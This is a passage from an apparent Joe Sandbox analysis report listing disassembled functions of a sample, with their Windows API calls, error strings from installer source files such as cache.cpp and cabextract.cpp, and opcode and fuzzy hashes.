                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4102: Sleep.KERNEL32(?,00000000,?,008785EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,00864DBC), ref: 008A4119
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 008797A4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLastSleep
                                                                                                                                                                                                                                                                                                  • String ID: %ls container from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open container in working path: %ls$Failed to verify container hash: %ls$Moving$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1275171361-1187406825
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6ede4d85a78bef6ec26ee9f000f8d07d4a31097e55e46aa680b8aa9effa3a83e
                                                                                                                                                                                                                                                                                                  • Instruction ID: fd96aec03602cd8b047907a3be8a9d8324a98222cb0415473652e3ff632c3be7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ede4d85a78bef6ec26ee9f000f8d07d4a31097e55e46aa680b8aa9effa3a83e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B421F832A407257BE6321D688C86FAB355CFF92BA0F114114FE59FE3C1D2A5DC0095E6
                                                                                                                                                                                                                                                                                                  Function 00866F85 Relevance: 18.2, APIs: 2, Strings: 10, Instructions: 227COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00866FB2
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 008671BE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to read variable included flag., xrefs: 008671AE
                                                                                                                                                                                                                                                                                                  • Failed to read variable literal flag., xrefs: 00867199
                                                                                                                                                                                                                                                                                                  • Failed to set variable value., xrefs: 00867171
                                                                                                                                                                                                                                                                                                  • Failed to set variable., xrefs: 00867192
                                                                                                                                                                                                                                                                                                  • Failed to read variable value type., xrefs: 008671A0
                                                                                                                                                                                                                                                                                                  • Unsupported variable type., xrefs: 00867184
                                                                                                                                                                                                                                                                                                  • Failed to read variable value as string., xrefs: 0086718B
                                                                                                                                                                                                                                                                                                  • Failed to read variable name., xrefs: 008671A7
                                                                                                                                                                                                                                                                                                  • Failed to read variable value as number., xrefs: 00867178
                                                                                                                                                                                                                                                                                                  • Failed to read variable count., xrefs: 00866FD2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable literal flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable value.$Failed to set variable.$Unsupported variable type.
                                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-528957463
                                                                                                                                                                                                                                                                                                  • Opcode ID: cb84f522a2e5e6cfed14a33979bd21d046e477bb8650a4465dab333b8f38bb73
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2ab52a562f5c15b05ed6112a6de09bd8f5939690fb557d68f7b8746eafde7854
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb84f522a2e5e6cfed14a33979bd21d046e477bb8650a4465dab333b8f38bb73
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A471A672C0421EABDF12DEA4CC41EAEBB79FF02718F114122F911E6151D7359E119BE1
                                                                                                                                                                                                                                                                                                  Function 008A44D1 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,?,?,00000000,?,00000000,?,?,?), ref: 008A4550
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A4566
                                                                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 008A45BF
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A45C9
                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,?,?,00000001), ref: 008A461D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008A4628
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00000001), ref: 008A4717
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 008A478A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$ErrorLast$CloseCreateHandlePointerReadSize
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3286166115-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: 39eb56a360b94a6eb76fb17868d038006fda992d34afe5374976fd3bdee160eb
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1182519ce42829466cd0e9bba583682a701c3e3777876991c3ce44cb3d70bafd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39eb56a360b94a6eb76fb17868d038006fda992d34afe5374976fd3bdee160eb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74811831A4022AEBFF218E598C45B7A7698FF83764F115129FD15EBA80E7F4DD0086D1
                                                                                                                                                                                                                                                                                                  Function 00863076 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 210COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000040,00000000,00000000), ref: 008630C1
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008630C7
                                                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000040,00000000,00000040,00000000,00000000), ref: 00863121
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00863127
                                                                                                                                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008631DB
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008631E5
                                                                                                                                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0086323B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00863245
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
                                                                                                                                                                                                                                                                                                  • String ID: @$pathutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1547313835-3022285739
                                                                                                                                                                                                                                                                                                  • Opcode ID: dc2d6aad73c513d4e05246bf850bad99b4d66173f863740737a771b62e92fa1a
                                                                                                                                                                                                                                                                                                  • Instruction ID: a8695382e783fb97de12cb727fcc0a21f72f8333eed945780150a912fc67d604
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc2d6aad73c513d4e05246bf850bad99b4d66173f863740737a771b62e92fa1a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F961BD33D0062ABBDB219AE48C54B9EBAA9FB05766F134165EE01FB240E775DF0487D0
                                                                                                                                                                                                                                                                                                  Function 00874D8D Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 00874DC0
                                                                                                                                                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000027), ref: 00874DEF
                                                                                                                                                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 00874E3A
                                                                                                                                                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000027), ref: 00874E66
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateFromStringUuid
                                                                                                                                                                                                                                                                                                  • String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4041566446-2510341293
                                                                                                                                                                                                                                                                                                  • Opcode ID: bbd9afeebd6548267d0e03a5a71ed9e56fd570bfff4d4c76d42ccbbfe1e3ae7e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6af49a5093cb3966eeb2377a30b6de968b8e90f0671d3385f8021956d0c2f217
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbd9afeebd6548267d0e03a5a71ed9e56fd570bfff4d4c76d42ccbbfe1e3ae7e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43418A72D00318ABDB20DBE8C946EDEBBF8FB45720F204126E909FB245D7759904CB91
                                                                                                                                                                                                                                                                                                  Function 00866037 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 107timeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 00866062
                                                                                                                                                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 00866076
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00866088
                                                                                                                                                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 008660DC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008660E6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set variant value., xrefs: 00866124
                                                                                                                                                                                                                                                                                                  • Failed to get the required buffer length for the Date., xrefs: 008660AD
                                                                                                                                                                                                                                                                                                  • variable.cpp, xrefs: 008660A3, 00866101
                                                                                                                                                                                                                                                                                                  • Failed to get the Date., xrefs: 0086610B
                                                                                                                                                                                                                                                                                                  • Failed to allocate the buffer for the Date., xrefs: 008660C4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DateErrorFormatLast$SystemTime
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2700948981-3682088697
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8668a65c84fb2b72bc7045341489bfdd9681860a4f943e6f26848302b410b92c
                                                                                                                                                                                                                                                                                                  • Instruction ID: debf5e0f27f482efe7071bf1a3333130a5344660bc7861d30cb409c02a1c69ca
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8668a65c84fb2b72bc7045341489bfdd9681860a4f943e6f26848302b410b92c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A131CD32A4076A7BDB119BE9CC42FAF7A78FB05710F120035FE01F7241E6659D4046E2
                                                                                                                                                                                                                                                                                                  Function 0087EA7D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,0086548E,?,?), ref: 0087EA9D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086548E,?,?), ref: 0087EAAA
                                                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0087E7B4,?,00000000,00000000), ref: 0087EB03
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086548E,?,?), ref: 0087EB10
                                                                                                                                                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,0086548E,?,?), ref: 0087EB4B
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,0086548E,?,?), ref: 0087EB6A
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,0086548E,?,?), ref: 0087EB77
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2351989216-3599963359
                                                                                                                                                                                                                                                                                                  • Opcode ID: c04d6c9eb8c8d0a75f2a729e413478bcd5c9aef022901c72a8abbf9b13f4374c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 87b90fbdb100063fd428e14ed353ef7f2a331d36d7fb2a2c9de8857c355a4a7b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c04d6c9eb8c8d0a75f2a729e413478bcd5c9aef022901c72a8abbf9b13f4374c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB319676D01229BBD711DFA98D85A9EFBA8FF08360F114165F914F7241E670DE0086A1
                                                                                                                                                                                                                                                                                                  Function 0087E645 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,0086548E,?,?), ref: 0087E666
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0086548E,?,?), ref: 0087E673
                                                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0087E3C8,00000000,00000000,00000000), ref: 0087E6D2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0086548E,?,?), ref: 0087E6DF
                                                                                                                                                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,0086548E,?,?), ref: 0087E71A
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,0086548E,?,?), ref: 0087E72E
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,0086548E,?,?), ref: 0087E73B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2351989216-1977201954
                                                                                                                                                                                                                                                                                                  • Opcode ID: b91c736aad12bb36d8bdcd5d48ef5324003d556aca2e964e0bd2ab7331843ff1
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5aa7b10d908e1053f2f4b1c5718da4e113dae65b688a3d869f27ccf1393629e4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b91c736aad12bb36d8bdcd5d48ef5324003d556aca2e964e0bd2ab7331843ff1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C31A476D00629BBDB218B99CC45A9FBBB8FF59710F1181A6FD14F7240E7749900CAE1
                                                                                                                                                                                                                                                                                                  Function 008814E1 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,771B2F60,?,?,00865405,008653BD,00000000,00865445), ref: 00881506
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00881519
                                                                                                                                                                                                                                                                                                  • GetExitCodeThread.KERNEL32(008AB488,?), ref: 0088155B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00881569
                                                                                                                                                                                                                                                                                                  • ResetEvent.KERNEL32(008AB460), ref: 008815A4
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008815AE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2979751695-3400260300
                                                                                                                                                                                                                                                                                                  • Opcode ID: b886dca446e12385f388a90fae9a78d8697b019220f6c08c541195223c7e5869
                                                                                                                                                                                                                                                                                                  • Instruction ID: 16488e6268a97d58bbafe4538678dcab82cc6f8afe474935d2ba2c17b8724b20
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b886dca446e12385f388a90fae9a78d8697b019220f6c08c541195223c7e5869
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E31C870A00205EBEB10AF698D09BAF7BFCFF44710B10416AF916D6660EB75CA019B61
                                                                                                                                                                                                                                                                                                  Function 008815FE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82synchronizationCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(008AB478,?,00000000,?,0086C1D3,?,008653BD,00000000,?,0087784D,?,0086566D,00865479,00865479,00000000,?), ref: 0088161B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086C1D3,?,008653BD,00000000,?,0087784D,?,0086566D,00865479,00865479,00000000,?,00865489,FFF9E89D,00865489), ref: 00881625
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(008AB488,000000FF,?,0086C1D3,?,008653BD,00000000,?,0087784D,?,0086566D,00865479,00865479,00000000,?,00865489), ref: 0088165F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086C1D3,?,008653BD,00000000,?,0087784D,?,0086566D,00865479,00865479,00000000,?,00865489,FFF9E89D,00865489), ref: 00881669
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00865489,?,00000000,?,0086C1D3,?,008653BD,00000000,?,0087784D,?,0086566D,00865479,00865479,00000000), ref: 008816B4
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00865489,?,00000000,?,0086C1D3,?,008653BD,00000000,?,0087784D,?,0086566D,00865479,00865479,00000000), ref: 008816C3
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00865489,?,00000000,?,0086C1D3,?,008653BD,00000000,?,0087784D,?,0086566D,00865479,00865479,00000000), ref: 008816D2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle$ErrorLast$EventObjectSingleWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1206859064-226982402
                                                                                                                                                                                                                                                                                                  • Opcode ID: 03455a1da3b734120479f796e934ec647e49b1ed6c15fce8ee953fef58af8532
